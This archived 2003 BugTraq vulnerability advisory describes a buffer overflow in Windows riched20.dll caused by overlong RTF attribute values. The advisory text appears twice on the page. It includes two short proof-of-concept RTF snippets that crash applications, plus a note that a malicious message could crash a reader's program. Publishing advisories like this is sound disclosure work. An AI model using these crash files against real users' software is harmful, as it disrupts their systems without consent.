BugTraq
Back to list
|
Post reply
Riched20.DLL attribute label buffer overflow vulnerability
Feb 16 2003 01:30PM
Jie Dong (Thkrdev yoursft com)
(1 replies)
========================================================================
===
=====
Security Defence Stdio vulnerability announcement [001]
Riched20.DLL attribute label buffer overflow vulnerability
URL:http:\\www.yoursft.com
Author: Thrkdev
finds date:2003年2月1日
Announce date:2003年2月14日
Affected system: Microsoft Windows 98
Microsoft Windows 2000
Microsoft Windows XP
Perhaps,this vulnerability was still in other operating
system, but untest .
EMAIL: Thkrdev (at) yoursft (dot) com [email concealed]
------------------------------------------------------------------------
Technical description:
A buffer overflow vulnerability exists in riched20.dll,which can result
in the collapse
of the application program that use the corresponding function of the DLL
module, But it is
very difficult to have the effect of allowing an attacker to execute
commands on a user?s system.
This problem exists in the analysed RTF file code, and there is an
overflows when drawing
figure-string( such as the size of the character) in the file form .This
overflow seem not to
be used for executing commands.
The following RTFfile may result in illegal operation :
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
"\fs" was used for setting the size of the followingly
words "www.yoursft.com". when the figure-string
that set the size of the fonts exceeding 1024byte(>1024b) , it Will cause
the buffer overflow ;And when
exceeding 65536byte(>65536b) it will probably cause crashing the
application program.
This promblom Not only appear in the setting of "\fs" , other attribute
will have the same problem under
the similar situation. And this following RTF files Will also result in
operating illegally :
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f01211111111111111111111111111111111122
22
\fs180 www.yoursft.com\fs20\par
}
The terrible thing is nowadays lots of software was affected by this
vulnerability. The attacker can send a
malicious message that include exploiting the vulnerability, then when you
read this message your program will be crashed.
------------------------------------------------------------------------
Security Defence Stdio is a software development / technological websites,
mainly developing NET security products ,
the software of Security Defence Stdio --Trojan Ender-- receives users'
extensive favorable comment
[ reply ]
Re: Riched20.DLL attribute label buffer overflow vulnerability
Feb 21 2003 10:28AM
Thor Larholm (thor pivx com)
(1 replies)
Re: Riched20.DLL attribute label buffer overflow vulnerability
Feb 24 2003 08:47PM
Raistlin (raistlin gioco net)
Privacy Statement
Copyright 2010, SecurityFocus
========================================================================
===
=====
Security Defence Stdio vulnerability announcement [001]
Riched20.DLL attribute label buffer overflow vulnerability
URL:http:\\www.yoursft.com
Author: Thrkdev
finds date:2003年2月1日
Announce date:2003年2月14日
Affected system: Microsoft Windows 98
Microsoft Windows 2000
Microsoft Windows XP
Perhaps,this vulnerability was still in other operating
system, but untest .
EMAIL: Thkrdev (at) yoursft (dot) com [email concealed]
------------------------------------------------------------------------
Technical description:
A buffer overflow vulnerability exists in riched20.dll,which can result
in the collapse
of the application program that use the corresponding function of the DLL
module, But it is
very difficult to have the effect of allowing an attacker to execute
commands on a user?s system.
This problem exists in the analysed RTF file code, and there is an
overflows when drawing
figure-string( such as the size of the character) in the file form .This
overflow seem not to
be used for executing commands.
The following RTFfile may result in illegal operation :
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
"\fs" was used for setting the size of the followingly
words "www.yoursft.com". when the figure-string
that set the size of the fonts exceeding 1024byte(>1024b) , it Will cause
the buffer overflow ;And when
exceeding 65536byte(>65536b) it will probably cause crashing the
application program.
This promblom Not only appear in the setting of "\fs" , other attribute
will have the same problem under
the similar situation. And this following RTF files Will also result in
operating illegally :
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f01211111111111111111111111111111111122
22
\fs180 www.yoursft.com\fs20\par
}
The terrible thing is nowadays lots of software was affected by this
vulnerability. The attacker can send a
malicious message that include exploiting the vulnerability, then when you
read this message your program will be crashed.
------------------------------------------------------------------------
Security Defence Stdio is a software development / technological websites,
mainly developing NET security products ,
the software of Security Defence Stdio --Trojan Ender-- receives users'
extensive favorable comment
[ reply ]